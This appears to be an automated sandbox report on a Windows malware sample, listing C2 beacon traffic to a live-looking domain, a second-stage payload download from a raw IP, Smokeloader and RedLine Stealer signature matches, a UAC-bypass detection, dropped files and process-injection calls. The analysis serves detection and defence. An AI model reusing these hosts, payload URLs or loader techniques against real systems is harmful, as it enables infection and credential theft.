                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjvagowrnc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ueuounaic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhxqowscaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqdpmu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxslssk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbdses.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxvmoh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hlixtq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bymgj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jviyq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://papeicwkil.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csplko.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecwfh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://avfvrfo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouqhut.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amjtlofw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: dowe.at
                Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrgphm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: dowe.at
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 123.253.32.170
Source: WerFault.exe, 00000013.00000003.544336242.0000000004B08000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000002.555779726.0000000004B08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000001.00000000.338958128.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322078451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.303824435.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.269421946.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.258393076.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown | HTTP traffic detected: POST /tmp/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tajcoxqjmd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 292 | Host: dowe.at
Source: unknown | DNS traffic detected: queries for: dowe.at
Source: global traffic | HTTP traffic detected: GET /upload/index.php HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: thepokeway.nl
Source: global traffic | HTTP traffic detected: GET /root2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 123.253.32.170
Source: unknown | HTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.6:49739 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 0.2.file.exe.2070e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.3.dfhwrav.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dfhwrav.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.dfhwrav.6d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: dfhwrav, 00000009.00000002.385029493.00000000006EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: Yara match | File source: Process Memory Space: ADCA.exe PID: 1432, type: MEMORYSTR

System Summary

Source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 16.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.5AF.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_00881940
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_00897244
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_00885B34
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_008770C4
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_006BA8DC
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_00889622
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: 10_2_0088C79C
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: String function: 0040ACB4 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: String function: 0040A3C0 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: String function: 0040A0C0 appears 300 times
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Code function: String function: 0040AEFC appears 33 times
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004014CF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401400 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401427 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004014F0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004013F5 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040138D NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402F9D GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileMappingW,GetWindowThreadProcessId,GetTokenInformation,ShellExecuteExW,NtOpenProcess,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQuerySystemInformation,NtQueryInformationProcess,NtOpenKey,NtEnumerateKey,RtlCreateUserThread,strstr,
Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_004014CF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_00401400 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_00401427 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_004014F0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\dfhwrav | Code function: 9_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004013F5 NtAllocateVirtualMemory,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_0040138D NtAllocateVirtualMemory,
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00402F9D CreateFileMappingW,GetWindowThreadProcessId,GetTokenInformation,ShellExecuteExW,NtOpenProcess,
                Source: file.exeStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: ADCA.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: 5AF.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: dfhwrav.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
                Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\explorer.exe | Section loaded: webio.dll
                Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
                Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
                Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll (this identical entry appears 34 more times in the report)
                Source: C:\Windows\explorer.exe | Section loaded: capabilityaccessmanagerclient.dll
                Source: 5AF.exe.1.dr | Static PE information: Section: .data ZLIB complexity 0.9896875
                Source: file.exe | Virustotal: Detection: 33%
                Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\dfhwrav C:\Users\user\AppData\Roaming\dfhwrav
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\ADCA.exe C:\Users\user\AppData\Local\Temp\ADCA.exe
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\5AF.exe C:\Users\user\AppData\Local\Temp\5AF.exe
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\5AF.exe "C:\Users\user\AppData\Local\Temp\5AF.exe"
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\ADCA.exe C:\Users\user\AppData\Local\Temp\ADCA.exe
                Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\5AF.exe C:\Users\user\AppData\Local\Temp\5AF.exe
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
